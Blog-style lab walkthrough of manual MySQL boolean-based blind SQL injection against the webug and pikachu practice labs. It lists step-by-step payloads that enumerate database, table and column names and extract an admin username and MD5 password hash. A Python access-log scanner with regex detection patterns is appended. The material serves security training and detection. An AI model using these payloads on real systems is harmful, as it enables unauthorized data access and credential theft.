webug lab: MySQL boolean-based blind injection, manual walkthrough notes – by Alan404

Lab: webug 4.0

An integer-type injection point sometimes still needs its quote closed.

If both and 1=1 and and 1=2 display normally, the input is wrapped in quotes that need closing.

%23 stands in for the # comment marker in a URL.

Having an echo point does not guarantee a UNION query will work; the returned value may be filtered (for example, select is filtered).

Purpose of limit: restrict the result to one row.

How to tell which table holds the administrators: look for names like admin, user, ...

If the names are messy, you can only guess them one by one.

Procedure: guess the length of the database name, then its characters one by one; guess how many tables there are and the length of each table name, then the table names themselves; decide which table holds what you need (admin or similar; otherwise try them one by one); then guess how many columns the table has, the length of each column name, the column names, and finally the contents.

Database, table, column, value (the order of enumeration).

limit 0,1 takes the first row (first table / first value); counting starts at 0.

substr('abcdef', start, length)

Boolean-based blind injection, where UNION queries are not supported; after finding the database name:

1. Find the length of the database name: id=2' and length(database())=5 %23

2. Guess the database name character by character: and ascii(substr(database(),1,1))>1 %23

3. Find how many tables there are: and (select count(*) from information_schema.tables)

4. Find the length of the table names

5.

Error-based injection: enter a malformed statement and the error is shown directly.

database() returns the current database.

Blind injection in the pikachu lab

1. Starting from the first value, vince, determine the number of columns: vince' order by 2# displays normally


2. Find the length of the database name: vince' and length(database())=7 # displays normally

Find the database name; substr extracts the characters:

vince' and ascii(substr(database(),1,1))=112# // first character of the database name

vince' and ascii(substr(database(),2,1))=105#

vince' and ascii(substr(database(),3,1))=107#

vince' and ascii(substr(database(),4,1))=97#

vince' and ascii(substr(database(),5,1))=99#

vince' and ascii(substr(database(),6,1))=104 #

vince' and ascii(substr(database(),7,1))=117 #

Decoding the ASCII values gives the database name: pikachu

3. Find how many tables the database has

vince' and (select count(*) from information_schema.tables where table_schema=database())=5 #

4. Find the length of each table name

vince' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=8#

vince' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=6#

vince' and (select length(table_name) from information_schema.tables where table_schema=database() limit 2,1)=7#

vince' and (select length(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5#

vince' and (select length(table_name) from information_schema.tables where table_schema=database() limit 4,1)=8#


5. Find the table names, extracting the characters of each

First table. The 'abcdef' in substr is whatever your select returns; table positions (limit) count from 0, character positions (substr) count from 1.

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104 #

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=116 #

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=116 #

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=112 #

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))=105 #

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))=110 #

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))=102 #

vince' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))=111 #

Result: httpinfo


6. Find how many columns httpinfo and the other tables have

vince' and (select count(column_name) from information_schema.columns where table_name='httpinfo')=6 #

vince' and (select count(column_name) from information_schema.columns where table_name='member')=7 #

vince' and (select count(column_name) from information_schema.columns where table_name='message')>0 #

vince' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema=database())=4 #

// Without and table_schema=database(), the query matches every table named users in any database on the MySQL server, not only the one in pikachu.


message is an empty table.


Anchor on table_schema together with table_name.


7. Find the length of each column name in the users table. The current database must be specified (database() can be replaced with 'pikachu'); when looking up column names you need to name the database, because tables with the same name exist in many databases.

vince' and (select length(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 0,1)=2 #

vince' and (select length(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 1,1)=8 #

vince' and (select length(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 2,1)=8 #

vince' and (select length(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 3,1)=5 #

8. Guess the characters of the second column's name

Extract each character of the third column of users // the current database need not be specified here

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),1,1))=112 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),2,1))=97 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),3,1))=115 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),4,1))=115 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),5,1))=119 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),6,1))=111 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),7,1))=114 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 2,1),8,1))=100 #

The ASCII codes spell password

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),1,1))=117 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),2,1))=115 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),3,1))=101 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),4,1))=114 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),5,1))=110 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),6,1))=97 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),7,1))=109 #

vince' and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 1,1),8,1))=101 #

username

9. Extract the contents of username and password

Find how many rows username has

vince' and (select count(username) from users)=3 #

Find the length of each username in users

vince' and (select length(username) from users limit 0,1)=5 #

vince' and (select length(username) from users limit 1,1)=7 #

vince' and (select length(username) from users limit 2,1)=4 #

Extract the username: each character of the first row

vince' and ascii(substr((select username from users limit 0,1),1,1))=97 #

vince' and ascii(substr((select username from users limit 0,1),2,1))=100 #

vince' and ascii(substr((select username from users limit 0,1),3,1))=109 #

vince' and ascii(substr((select username from users limit 0,1),4,1))=105 #

vince' and ascii(substr((select username from users limit 0,1),5,1))=110 #

admin

10. Extract password

vince' and (select length(password) from users limit 0,1)=32 # a 32-character value suggests the password is stored as an MD5 hash

vince' and ascii(substr((select password from users limit 0,1),1,1))=101# result: e

vince' and ascii(substr((select password from users limit 0,1),2,1))=49# result: 1


The remaining characters are not demonstrated one by one.

Cracking the MD5 hash yields the account's password.
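Added example, not part of the original notes or of the lab: the probe shapes walked through above (a closing quote followed by and, length(database()), ascii(substr(...)), lookups in information_schema) leave a recognisable trail in web-server access logs. This script URL-decodes constructed access-log lines, flags requests matching those shapes and groups near-identical probes per client IP; the path /search.php and the IP addresses are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; /search.php and the IPs are placeholders, not real.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Apr/2021:13:40:01 +0800] "GET /search.php?name=vince HTTP/1.1" 200 1532
10.0.0.9 - - [26/Apr/2021:13:40:02 +0800] "GET /search.php?name=vince%27+and+length%28database%28%29%29%3D7+%23 HTTP/1.1" 200 1532
10.0.0.9 - - [26/Apr/2021:13:40:03 +0800] "GET /search.php?name=vince%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D112%23 HTTP/1.1" 200 1532
10.0.0.9 - - [26/Apr/2021:13:40:04 +0800] "GET /search.php?name=vince%27+and+ascii%28substr%28database%28%29%2C2%2C1%29%29%3D105%23 HTTP/1.1" 200 1532
10.0.0.9 - - [26/Apr/2021:13:40:05 +0800] "GET /search.php?name=vince%27+and+%28select+count%28%2A%29+from+information_schema.tables+where+table_schema%3Ddatabase%28%29%29%3D5+%23 HTTP/1.1" 200 1532
10.0.0.7 - - [26/Apr/2021:13:40:06 +0800] "GET /search.php?name=alice HTTP/1.1" 200 1498
"""

# Common log format: client IP first, request line in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Probe shapes from the walkthrough above, matched against the decoded query.
SIGNATURES = {
    "quote_boolean": re.compile(r"'\s*(?:and|or)\b", re.I),
    "length_database": re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)", re.I),
    "ascii_substr": re.compile(r"ascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "information_schema": re.compile(r"information_schema\s*\.\s*(?:tables|columns)", re.I),
}

def scan_log(log_text):
    """Map client IP -> {"hits", "signatures", "templates"} for flagged requests.
    A template is the decoded query with numbers replaced by N, so the
    per-character probes (...,1,1))=112 / ...,2,1))=105) collapse into repeats."""
    findings = defaultdict(lambda: {"hits": 0, "signatures": set(),
                                    "templates": defaultdict(int)})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = unquote_plus(target.partition("?")[2])  # %27 -> ', %28 -> (, + -> space
        matched = {name for name, rx in SIGNATURES.items() if rx.search(query)}
        if matched:
            rec = findings[ip]
            rec["hits"] += 1
            rec["signatures"] |= matched
            rec["templates"][re.sub(r"\d+", "N", query)] += 1
    return dict(findings)

def suspicious_ips(findings, min_hits=3):
    """IPs with at least min_hits flagged requests: a single odd request may be
    noise, a burst that walks database -> tables -> columns is the blind pattern."""
    return sorted(ip for ip, rec in findings.items() if rec["hits"] >= min_hits)
```

Running scan_log over real logs needs only the decode step and the signature table adjusted to the server's log format; the template counter is what separates a single stray quote from an enumeration run.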

Source: freebuf.com 2021-04-26 13:40:24 by: Alan404
